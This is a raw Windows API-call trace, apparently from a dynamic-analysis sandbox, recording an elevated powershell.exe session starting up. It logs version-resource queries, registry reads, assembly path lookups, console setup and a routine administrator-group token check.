	[0856.958] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a328, puLen=0x14df70) returned 1
	[0856.958] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0856.958] CoTaskMemAlloc (cb=0x44) returned 0x229050
	[0856.958] lstrcpyW (in: lpString1=0x229050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0856.958] CoTaskMemFree (pv=0x229050) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a390, puLen=0x14df70) returned 1
	[0856.959] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0856.959] CoTaskMemAlloc (cb=0x76) returned 0x2529e0
	[0856.959] lstrcpyW (in: lpString1=0x2529e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0856.959] CoTaskMemFree (pv=0x2529e0) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a42c, puLen=0x14df70) returned 1
	[0856.959] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0856.959] CoTaskMemAlloc (cb=0x44) returned 0x229050
	[0856.959] lstrcpyW (in: lpString1=0x229050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0856.959] CoTaskMemFree (pv=0x229050) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a490, puLen=0x14df70) returned 1
	[0856.959] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0856.959] CoTaskMemAlloc (cb=0x58) returned 0x2091b0
	[0856.959] lstrcpyW (in: lpString1=0x2091b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0856.959] CoTaskMemFree (pv=0x2091b0) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a50c, puLen=0x14df70) returned 1
	[0856.959] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0856.959] CoTaskMemAlloc (cb=0x20) returned 0x2b70c0
	[0856.959] lstrcpyW (in: lpString1=0x2b70c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0856.959] CoTaskMemFree (pv=0x2b70c0) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a1b4, puLen=0x14df70) returned 1
	[0856.959] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0856.959] CoTaskMemAlloc (cb=0x66) returned 0x2b4870
	[0856.959] lstrcpyW (in: lpString1=0x2b4870, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0856.959] CoTaskMemFree (pv=0x2b4870) 
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x0, puLen=0x14df70) returned 0
	[0856.959] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x0, puLen=0x14df70) returned 0
	[0856.960] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x0, puLen=0x14df70) returned 0
	[0856.960] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14df48, puLen=0x14df40 | out: lplpBuffer=0x14df48*=0x2e6a15c, puLen=0x14df40) returned 1
	[0856.960] CoTaskMemAlloc (cb=0x204) returned 0x257d20
	[0856.960] VerLanguageNameW (in: wLang=0x0, szLang=0x257d20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0856.960] CoTaskMemFree (pv=0x257d20) 
	[0856.960] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\", lplpBuffer=0x14df98, puLen=0x14df90 | out: lplpBuffer=0x14df98*=0x2e6a0e8, puLen=0x14df90) returned 1
	[0856.969] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0856.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.969] CoTaskMemFree (pv=0x242b10) 
	[0856.974] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0856.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.974] CoTaskMemFree (pv=0x242b10) 
	[0856.982] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14de68 | out: phkResult=0x14de68*=0x2f8) returned 0x0
	[0856.983] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14de58 | out: phkResult=0x14de58*=0x2fc) returned 0x0
	[0856.984] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dee8 | out: phkResult=0x14dee8*=0x300) returned 0x0
	[0856.987] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14de2c, lpData=0x0, lpcbData=0x14de28*=0x0 | out: lpType=0x14de2c*=0x1, lpData=0x0, lpcbData=0x14de28*=0x56) returned 0x0
	[0856.988] CoTaskMemAlloc (cb=0x5a) returned 0x2b4800
	[0856.988] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ddfc, lpData=0x2b4800, lpcbData=0x14ddf8*=0x56 | out: lpType=0x14ddfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ddf8*=0x56) returned 0x0
	[0856.988] CoTaskMemFree (pv=0x2b4800) 
	[0858.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.104] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0858.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.104] CoTaskMemFree (pv=0x242b10) 
	[0864.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0864.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0866.161] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0866.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.161] CoTaskMemFree (pv=0x242b10) 
	[0866.991] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0866.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.991] CoTaskMemFree (pv=0x242b10) 
	[0867.828] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0867.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.829] CoTaskMemFree (pv=0x242b10) 
	[0867.830] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0867.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.830] CoTaskMemFree (pv=0x242b10) 
	[0867.831] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0867.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.831] CoTaskMemFree (pv=0x242b10) 
	[0874.258] CoTaskMemAlloc (cb=0x104) returned 0x2c6ec0
	[0874.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.259] CoTaskMemFree (pv=0x2c6ec0) 
	[0874.262] CoTaskMemAlloc (cb=0x104) returned 0x2c6ec0
	[0874.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.262] CoTaskMemFree (pv=0x2c6ec0) 
	[0875.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0875.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0900.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0900.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0925.439] CoTaskMemAlloc (cb=0x104) returned 0x24dc80
	[0925.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24dc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.440] CoTaskMemFree (pv=0x24dc80) 
	[0925.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0925.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0925.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0930.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0930.019] SetErrorMode (uMode=0x1) returned 0x1
	[0930.020] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14ddc0 | out: lpFileInformation=0x14ddc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0930.020] SetErrorMode (uMode=0x1) returned 0x1
	[0963.113] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.113] CoTaskMemFree (pv=0x2b0de0) 
	[0963.114] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.114] CoTaskMemFree (pv=0x2b0de0) 
	[0963.114] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.114] CoTaskMemFree (pv=0x2b0de0) 
	[0963.117] CoCreateGuid (in: pguid=0x14e188 | out: pguid=0x14e188*(Data1=0x2904da43, Data2=0x84c7, Data3=0x40e7, Data4=([0]=0xa5, [1]=0x42, [2]=0xb5, [3]=0xba, [4]=0x2e, [5]=0xf2, [6]=0x31, [7]=0x57))) returned 0x0
	[0963.120] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.120] CoTaskMemFree (pv=0x2b0de0) 
	[0963.122] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.122] CoTaskMemFree (pv=0x2b0de0) 
	[0963.124] CoTaskMemAlloc (cb=0x104) returned 0x2b0de0
	[0963.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0de0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.124] CoTaskMemFree (pv=0x2b0de0) 
	[0963.140] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0963.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14de30 | out: lpConsoleScreenBufferInfo=0x14de30) returned 1
	[0963.394] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0963.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14de30 | out: lpConsoleScreenBufferInfo=0x14de30) returned 1
	[0963.395] GetVersionExW (in: lpVersionInformation=0x14ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0963.398] GetCurrentProcess () returned 0xffffffffffffffff
	[0963.399] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14de58 | out: TokenHandle=0x14de58*=0xe4) returned 1
	[0963.403] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14dd78 | out: TokenInformation=0x0, ReturnLength=0x14dd78) returned 0
	[0963.404] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x217300
	[0963.404] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x217300, TokenInformationLength=0x4, ReturnLength=0x14dd78 | out: TokenInformation=0x217300, ReturnLength=0x14dd78) returned 1
	[0963.406] DuplicateTokenEx (in: hExistingToken=0xe4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14ded8 | out: phNewToken=0x14ded8*=0x300) returned 1
	[0963.406] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14dd78 | out: TokenInformation=0x0, ReturnLength=0x14dd78) returned 0
	[0963.406] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x217330
	[0963.406] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x217330, TokenInformationLength=0x4, ReturnLength=0x14dd78 | out: TokenInformation=0x217330, ReturnLength=0x14dd78) returned 1
	[0963.407] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2e8bc28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14dee8 | out: IsMember=0x14dee8) returned 1
	[0963.407] CloseHandle (hObject=0x300) returned 1
	[0963.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.991] CoTaskMemAlloc (cb=0x804) returned 0x2cf4d0
	[0963.991] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4d0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0963.992] CoTaskMemFree (pv=0x2cf4d0) 
	[0964.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
